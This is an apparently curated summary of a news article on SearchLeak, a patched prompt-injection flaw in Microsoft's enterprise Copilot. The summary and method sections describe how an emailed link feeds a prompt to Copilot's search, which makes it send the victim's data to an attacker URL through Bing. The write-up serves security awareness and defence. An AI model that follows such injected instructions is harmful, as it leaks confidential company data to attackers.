SearchLeak: Prompt-inject enterprise Copilot with a search

2026-06-17 · Source: Pivot to AI · Field: Technology & Digital — Artificial Intelligence & Machine Learning, Cybersecurity & Data Privacy, Cloud Computing & IT Infrastructure · Depth: Intermediate, medium

Summary

SearchLeak, a prompt injection vulnerability in Microsoft's enterprise Copilot, discovered by Varonis, allows attackers to exfiltrate confidential company information. This one-click attack, patched by Microsoft on June 4th, 2026, chains three vulnerabilities. An attacker sends an email with a malicious link that, when clicked, calls Copilot's enterprise search with a prompt. This prompt instructs Copilot to call an attacker-controlled web address, encoding the victim's data within the URL. Bing, trusted by Copilot, then executes this call, leaking sensitive information. The chained vulnerabilities include Copilot treating search strings as direct prompts without sanitization, a race condition allowing an image tag to load before output sanitization, and Bing's execution of the attacker's web address. Microsoft classified this as a critical issue (CVE-2026-42824).

Key takeaway

For IT Professionals evaluating enterprise Copilot deployments, recognize that prompt injection vulnerabilities like SearchLeak are inherent risks when chatbots perform "real work" and interact with external services. You must prioritize stringent input validation and output sanitization, even after vendor patches. Continuously assess the security posture of AI agents that can execute external actions, as new chained vulnerabilities are likely to emerge.

Key insights

Prompt injection remains a fundamental security flaw in enterprise chatbots.

Principles

• Chatbots doing "real work" are inherently unsecurable.
• Search strings can be treated as direct prompts.
• Chaining small vulnerabilities creates critical exploits.

Method

An attacker emails a link; the victim clicks it. The link sends a malicious prompt to Copilot's enterprise search, which then calls an attacker-controlled URL with the victim's data, leaked via Bing.

In practice

• Be wary of links in emails.
• Scrutinize chatbot search inputs.
• Implement robust output sanitization.

Topics

• Prompt Injection
• Microsoft Copilot
• Enterprise Security
• AI Vulnerabilities
• Varonis
• CVE-2026-42824

Best for: CTO, VP of Engineering/Data, Director of AI/ML, AI Security Engineer, MLOps Engineer, IT Professional

Related on AIssential

• The EchoLeak Lesson: Why Production AI Agents Need Real Security — Zero-click prompt injection exploits hidden instructions in user-facing content to compromise AI agents.
• Prompt-inject ChatGPT with any web page — Chatbots inherently struggle to differentiate instructions from data, making prompt injection an unfixable security vulnerability.
• OpenAI plans to acquire Promptfoo and bake AI security testing directly into its Frontier enterprise platform — Integrating AI security testing into enterprise platforms enhances application robustness and compliance.
• Securing Azure AI Applications: Against Prompt Injection | Part - 2 — Prompt injection is an inherent LLM vulnerability requiring defense-in-depth across all application layers, treating all input as untrusted.
• An AI agent hacked McKinsey's internal AI platform in two hours using a decades-old technique — Classic SQL injection vulnerabilities can enable silent, widespread AI system manipulation via prompt and RAG data access.
• The VibeSec reckoning: Why prompting your AI to be secure isn't enough — AI-assisted development requires codified, deterministic security enforcement beyond mere prompts.

Open in AIssential →

Editorial summary, takeaway, and curation by AIssential. Original article published by Pivot to AI.